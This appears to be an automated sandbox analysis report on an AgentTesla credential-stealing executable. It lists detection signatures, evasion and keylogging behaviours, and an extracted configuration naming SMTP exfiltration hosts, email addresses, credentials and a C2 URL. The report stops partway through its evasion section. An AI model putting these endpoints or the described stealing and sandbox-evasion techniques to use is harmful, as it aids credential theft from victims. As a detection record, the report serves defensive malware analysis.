Play interactive tour

Edit tour

Analysis Report AE-808_RAJEN.exe

Overview

General Information

Sample Name:	AE-808_RAJEN.exe
Analysis ID:	344977
MD5:	208f2494a82c3b830d676c187e1f03d1
SHA1:	98f350298f0b61cfd94c73bca51ef61802188527
SHA256:	a659c50e03822cd595bf5d21007b2870fda97b6d4a5d3840d68bf8f333cc47ea
Tags:	AgentTeslaexe
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AgentTesla

Yara detected AntiVM_3

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Installs a global keyboard hook

Machine Learning detection for sample

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Antivirus or Machine Learning detection for unpacked file

Contains capabilities to detect virtual machines

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w10x64

AE-808_RAJEN.exe (PID: 6140 cmdline: 'C:\Users\user\Desktop\AE-808_RAJEN.exe' MD5: 208F2494A82C3B830D676C187E1F03D1)

AE-808_RAJEN.exe (PID: 2912 cmdline: C:\Users\user\Desktop\AE-808_RAJEN.exe MD5: 208F2494A82C3B830D676C187E1F03D1)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "=0AcmYy16kpc", "URL: ": "https://EiR6SA0ya1Q.org", "To: ": "bluez@hisensetech.gq", "ByHost: ": "server116.web-hosting.com:587", "Password: ": "=0AvNB2DkamI", "From: ": "bluezlog@hisensetech.gq"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.654461075.0000000002B91000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.654506944.0000000002BCE000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.654789370.0000000003B99000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.654908714.0000000003C86000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.1030691966.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.1032201040.0000000003341000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.1032201040.0000000003341000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AE-808_RAJEN.exe PID: 2912	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: AE-808_RAJEN.exe PID: 2912	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AE-808_RAJEN.exe PID: 6140	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: AE-808_RAJEN.exe PID: 6140	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.AE-808_RAJEN.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: AE-808_RAJEN.exe.2912.1.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "=0AcmYy16kpc", "URL: ": "https://EiR6SA0ya1Q.org", "To: ": "bluez@hisensetech.gq", "ByHost: ": "server116.web-hosting.com:587", "Password: ": "=0AvNB2DkamI", "From: ": "bluezlog@hisensetech.gq"}

Multi AV Scanner detection for submitted file

Show sources

Source: AE-808_RAJEN.exe	Virustotal: Detection: 35%			Perma Link
Source: AE-808_RAJEN.exe	ReversingLabs: Detection: 36%

Machine Learning detection for sample

Show sources

Source: AE-808_RAJEN.exe

Joe Sandbox ML: detected

Source: 1.2.AE-808_RAJEN.exe.400000.0.unpack

Avira: Label: TR/Spy.Gen8

Compliance:

Uses 32bit PE files

Show sources

Source: AE-808_RAJEN.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: AE-808_RAJEN.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49779 -> 68.65.122.156:587

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://EiR6SA0ya1Q.org

Source: global traffic

TCP traffic: 192.168.2.4:49779 -> 68.65.122.156:587

Source: global traffic

TCP traffic: 192.168.2.4:49779 -> 68.65.122.156:587

Source: unknown

DNS traffic detected: queries for: server116.web-hosting.com

Source: AE-808_RAJEN.exe, 00000001.00000002.1032201040.0000000003341000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: AE-808_RAJEN.exe, 00000001.00000002.1032201040.0000000003341000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: AE-808_RAJEN.exe, 00000001.00000002.1032201040.0000000003341000.00000004.00000001.sdmp	String found in binary or memory: http://lOlcWJ.com
Source: AE-808_RAJEN.exe, 00000000.00000002.654461075.0000000002B91000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: AE-808_RAJEN.exe, 00000001.00000002.1032679809.00000000036A5000.00000004.00000001.sdmp	String found in binary or memory: http://server116.web-hosting.com
Source: AE-808_RAJEN.exe	String found in binary or memory: http://simpletimelapse.sourceforge.net/update/version.txt?Refresh=
Source: AE-808_RAJEN.exe, 00000001.00000002.1032201040.0000000003341000.00000004.00000001.sdmp	String found in binary or memory: https://EiR6SA0ya1Q.or
Source: AE-808_RAJEN.exe, 00000001.00000002.1032201040.0000000003341000.00000004.00000001.sdmp	String found in binary or memory: https://EiR6SA0ya1Q.org
Source: AE-808_RAJEN.exe	String found in binary or memory: https://api.lightboot.org/panel/index.php?page=Api&key=b6udeJ2WqDoyHKzzsEjfG3QajboCjeJv&host=
Source: AE-808_RAJEN.exe	String found in binary or memory: https://ffmpeg.org
Source: AE-808_RAJEN.exe	String found in binary or memory: https://simpletimelapse.sourceforge.io/update/changelog.txt
Source: AE-808_RAJEN.exe	String found in binary or memory: https://simpletimelapse.sourceforge.io/update/version.txt
Source: AE-808_RAJEN.exe	String found in binary or memory: https://simpletimelapse.sourceforge.io/update/version.txtwhttps://simpletimelapse.sourceforge.io/upd
Source: AE-808_RAJEN.exe	String found in binary or memory: https://www.flaticon.com/packs/free-basic-ui-elements
Source: AE-808_RAJEN.exe, 00000000.00000002.654789370.0000000003B99000.00000004.00000001.sdmp, AE-808_RAJEN.exe, 00000001.00000002.1030691966.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: AE-808_RAJEN.exe, 00000001.00000002.1032201040.0000000003341000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\AE-808_RAJEN.exe

Jump to behavior

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary:

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 0_2_02A5C2B0	0_2_02A5C2B0
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 0_2_02A599B8	0_2_02A599B8
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 0_2_05EB6290	0_2_05EB6290
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 0_2_05EB0040	0_2_05EB0040
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 0_2_05EB0006	0_2_05EB0006
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 0_2_05EB001C	0_2_05EB001C
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 0_2_05EB6280	0_2_05EB6280
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 0_2_06504A50	0_2_06504A50
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 0_2_06508728	0_2_06508728
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 0_2_06504180	0_2_06504180
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 0_2_06503E38	0_2_06503E38
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 0_2_06500015	0_2_06500015
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 1_2_01447C68	1_2_01447C68
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 1_2_0144DF28	1_2_0144DF28
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 1_2_01440B51	1_2_01440B51
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 1_2_01448FA0	1_2_01448FA0
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 1_2_017B47A0	1_2_017B47A0
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 1_2_017B4790	1_2_017B4790
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 1_2_064D6510	1_2_064D6510
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 1_2_064DEBD0	1_2_064DEBD0
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 1_2_064D6858	1_2_064D6858
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 1_2_064D90F0	1_2_064D90F0
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 1_2_064D7128	1_2_064D7128

Source: AE-808_RAJEN.exe	Binary or memory string: OriginalFilename vs AE-808_RAJEN.exe
Source: AE-808_RAJEN.exe, 00000000.00000002.654506944.0000000002BCE000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSoapName.dll2 vs AE-808_RAJEN.exe
Source: AE-808_RAJEN.exe, 00000000.00000002.654461075.0000000002B91000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameJbNoFYPjeMFbpEdEIKHcoCEGJFhJNzgafOODrX.exe4 vs AE-808_RAJEN.exe
Source: AE-808_RAJEN.exe, 00000000.00000002.654908714.0000000003C86000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamePositiveSign.dll< vs AE-808_RAJEN.exe
Source: AE-808_RAJEN.exe, 00000000.00000000.646175766.0000000000672000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameXmlToFieldTypeMap.exeL vs AE-808_RAJEN.exe
Source: AE-808_RAJEN.exe	Binary or memory string: OriginalFilename vs AE-808_RAJEN.exe
Source: AE-808_RAJEN.exe, 00000001.00000002.1033808650.0000000006380000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs AE-808_RAJEN.exe
Source: AE-808_RAJEN.exe, 00000001.00000002.1030890833.0000000001338000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs AE-808_RAJEN.exe
Source: AE-808_RAJEN.exe, 00000001.00000002.1031370246.000000000164A000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs AE-808_RAJEN.exe
Source: AE-808_RAJEN.exe, 00000001.00000000.651232600.0000000000EA2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameXmlToFieldTypeMap.exeL vs AE-808_RAJEN.exe
Source: AE-808_RAJEN.exe, 00000001.00000002.1030691966.0000000000402000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameJbNoFYPjeMFbpEdEIKHcoCEGJFhJNzgafOODrX.exe4 vs AE-808_RAJEN.exe
Source: AE-808_RAJEN.exe, 00000001.00000002.1031811029.0000000001880000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamewshom.ocx.mui vs AE-808_RAJEN.exe
Source: AE-808_RAJEN.exe	Binary or memory string: OriginalFilenameXmlToFieldTypeMap.exeL vs AE-808_RAJEN.exe

Source: AE-808_RAJEN.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: AE-808_RAJEN.exe, BowenTheatre.Bookings/Encrypta??o.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: AE-808_RAJEN.exe, BowenTheatre.Bookings/Encrypta??o.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 0.0.AE-808_RAJEN.exe.670000.0.unpack, BowenTheatre.Bookings/Encrypta??o.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.0.AE-808_RAJEN.exe.670000.0.unpack, BowenTheatre.Bookings/Encrypta??o.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 1.0.AE-808_RAJEN.exe.ea0000.0.unpack, BowenTheatre.Bookings/Encrypta??o.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.0.AE-808_RAJEN.exe.ea0000.0.unpack, BowenTheatre.Bookings/Encrypta??o.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@1/1

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AE-808_RAJEN.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe

Mutant created: \Sessions\1\BaseNamedObjects\ZOfxnTxUBGrGSPTUnoyZEyJ

Source: AE-808_RAJEN.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: AE-808_RAJEN.exe	Virustotal: Detection: 35%
Source: AE-808_RAJEN.exe	ReversingLabs: Detection: 36%

Source: unknown	Process created: C:\Users\user\Desktop\AE-808_RAJEN.exe 'C:\Users\user\Desktop\AE-808_RAJEN.exe'
Source: unknown	Process created: C:\Users\user\Desktop\AE-808_RAJEN.exe C:\Users\user\Desktop\AE-808_RAJEN.exe
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process created: C:\Users\user\Desktop\AE-808_RAJEN.exe C:\Users\user\Desktop\AE-808_RAJEN.exe	Jump to behavior

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: AE-808_RAJEN.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: AE-808_RAJEN.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation:

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 0_2_0067A95E push es; retn 0001h	0_2_0067AB0D
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 0_2_05EB49EC pushad ; iretd	0_2_05EB49ED
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 0_2_05EB4884 push ebx; retf	0_2_05EB4885
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 0_2_065091E6 push esi; ret	0_2_065091E8
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 1_2_00EAA95E push es; retn 0001h	1_2_00EAAB0D
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Code function: 1_2_064DC600 push es; ret	1_2_064DC610

Source: initial sample

Static PE information: section name: .text entropy: 7.26312302148

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000000.00000002.654461075.0000000002B91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.654506944.0000000002BCE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AE-808_RAJEN.exe PID: 6140, type: MEMORY

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

